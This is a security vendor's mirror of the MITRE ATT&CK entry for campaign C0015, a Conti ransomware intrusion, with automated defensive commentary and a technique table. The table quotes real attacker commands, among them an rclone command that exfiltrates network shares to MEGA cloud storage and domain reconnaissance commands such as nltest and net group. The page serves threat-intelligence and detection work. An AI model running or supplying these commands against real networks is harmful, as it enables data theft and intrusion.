LiveActive security incident?Get immediate response
MITRE ATT&CK® Campaign

C0015: C0015

C0015 was a ransomware intrusion during which the unidentified attackers used Bazar, Cobalt Strike, and Conti, along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated Conti ransomware playbook based on the observed pattern of activity and operator errors.[1]

EnterpriseC0015CampaignObject v1.0Modified
Glexia's Take · Automated analysis

Security context for executives and security teams

Automation confidenceMedium

C0015: C0015 describes [C0015](https://attack.mitre.org/campaigns/C0015) was a ransomware intrusion during which the unidentified attackers used [Bazar](https://attack.mitre.org/software/S0534), [Cobalt Strike](https://attack.mitre.org/software/S0154), and [Conti](https://attack.mitre.org/software/S0575), along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated [Conti](https://attack.mitre.org/software/S0575) ransomware playbook based on the observed pattern of activity and o...

Executive priority

C0015: C0015 is an official MITRE ATT&CK campaign. Glexia treats it as defensive behavior context for prioritizing monitoring, control validation, and response planning without using the object by itself as an attribution claim.

Technical view

Security teams should validate C0015: C0015 by reviewing the official ATT&CK relationships, mapped tactics (the mapped ATT&CK tactic context), supported platforms (the platforms named in the official object), and available local telemetry before making detection or mitigation decisions.

Likely telemetry

  • Official ATT&CK relationships and object metadata

Detection direction

  • Validate whether C0015: C0015 appears in your detection coverage and tabletop scenarios.
  • Use the object to align executive risk language with SOC, incident response, and detection engineering work.
  • Do not treat ATT&CK relationship context as attribution without corroborating evidence.

Mitigation priorities

  • Map the object to existing controls and identify missing telemetry or response ownership.
  • Prioritize mitigations that reduce exposure on the listed platforms and tactics.
  • Review adjacent ATT&CK relationships before changing policy, detections, or reporting language.
Additional notes and limits

Baseline Glexia take generated from the official MITRE ATT&CK STIX object, source hash, tactics, platforms, and detection fields. It is safe to replace with a richer model-generated take for the same source hash later.

This baseline take is source-grounded and schema-validated, but it does not include environment-specific telemetry, incident evidence, or threat-intelligence corroboration.

Generated from the cited source records. This long-tail analysis has not been individually reviewed by a named human.

Official MITRE ATT&CK definition

C0015

C0015 was a ransomware intrusion during which the unidentified attackers used Bazar, Cobalt Strike, and Conti, along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated Conti ransomware playbook based on the observed pattern of activity and operator errors.[1]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

34 rows
DomainIDNameRelationship / procedure
EnterpriseT1135Network Share Discovery

During C0015, the threat actors executed the PowerView ShareFinder module to identify open shares.[1]

EnterpriseT1047Windows Management Instrumentation

During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host.[1]

EnterpriseT1083File and Directory Discovery

During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.[1]

EnterpriseT1553.002Code SigningSub-technique

For C0015, the threat actors used DLL files that had invalid certificates.[1]

EnterpriseT1567.002Exfiltration to Cloud StorageSub-technique

During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.[1]

EnterpriseT1204.002Malicious FileSub-technique

During C0015, the threat actors relied on users to enable macros within a malicious Microsoft Word document.[1]

EnterpriseT1074.001Local Data StagingSub-technique

During C0015, PowerView's file share enumeration results were stored in the file `c:\ProgramData\found_shares.txt`.[1]

EnterpriseT1218.011Rundll32Sub-technique

During C0015, the threat actors loaded DLLs via `rundll32` using the `svchost` process.[1]

EnterpriseT1566.001Spearphishing AttachmentSub-technique

For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.[1]

EnterpriseT1005Data from Local System

During C0015, the threat actors obtained files and data from the compromised network.[1]

EnterpriseT1069.001Local GroupsSub-technique

During C0015, the threat actors used the command `net localgroup "adminstrator" ` to identify accounts with local administrator rights.[1]

EnterpriseT1057Process Discovery

During C0015, the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes.[1]

EnterpriseT1069.002Domain GroupsSub-technique

During C0015, the threat actors use the command `net group "domain admins" /dom` to enumerate domain groups.[1]

EnterpriseT1105Ingress Tool Transfer

During C0015, the threat actors downloaded additional tools and files onto a compromised network.[1]

EnterpriseT1055.001Dynamic-link Library InjectionSub-technique

During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.[1]

EnterpriseT1059.005Visual BasicSub-technique

During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.[1]

EnterpriseT1486Data Encrypted for Impact

During C0015, the threat actors used Conti ransomware to encrypt a compromised network.[1]

EnterpriseT1027Obfuscated Files or Information

During C0015, the threat actors used Base64-encoded strings.[1]

EnterpriseT1059.003Windows Command ShellSub-technique

During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries.[1]

EnterpriseT1218.010Regsvr32Sub-technique

During C0015, the threat actors employed code that used `regsvr32` for execution.[1]

EnterpriseT1588.001MalwareSub-technique

For C0015, the threat actors used Cobalt Strike and Conti ransomware.[1]

EnterpriseT1021.001Remote Desktop ProtocolSub-technique

During C0015, the threat actors used RDP to access specific network hosts of interest.[1]

EnterpriseT1124System Time Discovery

During C0015, the threat actors used the command `net view /all time` to gather the local time of a compromised network.[1]

EnterpriseT1030Data Transfer Size Limits

During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration.[1]

EnterpriseT1219.002Remote Desktop SoftwareSub-technique

During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network.[1]

EnterpriseT1039Data from Network Shared Drive

During C0015, the threat actors collected files from network shared drives prior to network encryption.[1]

EnterpriseT1570Lateral Tool Transfer

During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network.[1]

EnterpriseT1018Remote System Discovery

During C0015, the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.[1]

EnterpriseT1016System Network Configuration Discovery

During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.[1]

EnterpriseT1588.002ToolSub-technique

For C0015, the threat actors obtained a variety of tools, including AdFind, AnyDesk, and Process Hacker.[1]

EnterpriseT1059.007JavaScriptSub-technique

During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code.[1]

EnterpriseT1036Masquerading

During C0015, the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file.[1]

EnterpriseT1482Domain Trust Discovery

During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.[1]

EnterpriseT1218.005MshtaSub-technique

During C0015, the threat actors used `mshta` to execute DLLs.[1]

Associated objects

Groups, software, and campaigns

MalwareEnterprise

S0154: Cobalt Strike

Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]

In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]

LinuxmacOSWindows
MalwareEnterprise

S0575: Conti

Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using Conti steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.[1][2][3]

Windows
ToolEnterprise

S1040: Rclone

Rclone is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. Rclone has been used in a number of ransomware campaigns, including those associated with the Conti and DarkSide Ransomware-as-a-Service operations.[1][2][3][4][5]

LinuxWindowsmacOS
MalwareEnterprise

S0534: Bazar

Bazar is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. Bazar reportedly has ties to TrickBot campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.[1]

Windows
Relationship explorer

All related ATT&CK context

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.

ATT&CK release
19.2
Object version
1.0
Created
Modified
Raw hash
56be2d34056cee91...
Imported snapshots across ATT&CK releases(2)
ReleaseBundle importedObject versionModifiedStatusRaw hash
19.21.0Current bundle56be2d34056c…
19.11.0Older bundle39d32cb0180d…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    DFIR Conti Bazar Nov 2021

    DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.

    Open source URL
  2. [2]
    mitre-attackC0015
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.